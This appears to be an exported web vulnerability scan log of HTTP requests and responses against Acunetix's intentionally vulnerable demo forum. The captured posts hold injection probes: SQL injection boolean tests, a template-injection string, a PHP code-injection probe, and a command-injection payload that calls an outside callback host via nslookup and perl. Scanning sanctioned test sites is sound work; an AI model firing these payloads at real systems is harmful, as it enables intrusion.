<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>/\xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 2+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 2+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 2+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4128 |
Response Body - size: 4,128 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>995022</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4180 |
Response Body - size: 4,180 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx{{98991*97996}}xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx{{98991*97996}}xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx{{98991*97996}}xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4147 |
Response Body - size: 4,147 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>";print(md5(31337));$a="</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4402 |
Response Body - size: 4,402 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")|(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")&(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4144 |
